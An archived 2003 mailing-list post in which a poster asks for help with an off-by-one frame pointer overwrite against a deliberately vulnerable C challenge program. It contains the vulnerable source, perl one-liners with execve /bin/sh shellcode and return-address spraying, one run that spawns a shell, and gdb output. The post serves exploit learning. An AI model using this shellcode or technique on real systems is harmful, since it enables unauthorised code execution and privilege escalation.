Vulnerability Development mailing list archives
Frame Pointer Overwriting
From: mike cramp <mikecc () unixclan net>
Date: 23 May 2003 10:24:59 -0700
Hey guys, I'm having some trouble with frame pointer overwriting, and I was wondering if anyone could shed any light on this. First of all, here is the vulnerable program: mikecc@darkstar frame $ cat vuln_6.c /* Is It Vulnerable!? you sure? check again! */ /* * bob.dtors.net * * --------------------------------------------------- * Dtors Security Research (DSR) * Code by: bob * Mail: bob () dtors net * --------------------------------------------------- * * Build it and exploit it * show us the exploitation log and get extra rights !! * * * Is It Vulnerable!? you sure? check again! * -- this code was taken from bobs person homepage * http://it.dtors.net */ #include <stdio.h> #include <string.h> #define SIZE 256 void bob(char *ptr) { char buffer[SIZE]; strncpy(buffer, ptr, SIZE+1); printf("buffer is at %p\n",buffer); { int a,b; for (a=b=0;a<=SIZE;a++,b+=3) { if (b!=0 && !(b%26)) printf("\n"); printf("%02x ", (unsigned char)buffer[a]); } printf("\n"); } } int main(int argc, char **argv, char **envp) { if (argc < 2) { fprintf(stdout, "bob () dtors net\n"); exit(1); } bob(argv[1]); return 0; } mikecc@darkstar frame $ Now, I can exploit this if I store the shellcode in the environment: mikecc@darkstar frame $ ./6 `perl -e 'print "\xd0\xfd\xff\xbf"x64 . "\x00"'` buffer is at 0xbffff4a8 d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf 00 sh-2.05b$ But, I do not understand how to find the overflow byte, or why this one works: \x00 Now since I am researching a remote frame pointer overwrite, I need to learn how to store the exploit string in the command line: mikecc@darkstar frame $ ./6 `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\xe3\x52\x53\x89\xe1\xcd\x80\x90\x90" . "\x63\xf9\xff\xbf"x58 . "\x09"'` buffer is at 0xbffff6a8 6a 0b 58 99 52 68 6e 2f 73 68 68 2f 2f 62 69 e3 52 53 89 e1 cd 80 90 90 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 00 Illegal instruction (core dumped) mikecc@darkstar frame $ When I open up the core dump, I check ebp: (gdb) i reg ebp ebp 0xbffff963 0xbffff963 (gdb) Now since I cannot copy and paste weird ASCII characters in Evolution, I do: x/s $ebp and it shows my shellcode. Why is this not executing a shell? Thanks, Mike
Current thread:
- Frame Pointer Overwriting mike cramp (May 23)
- Re: Frame Pointer Overwriting Joel Eriksson (May 24)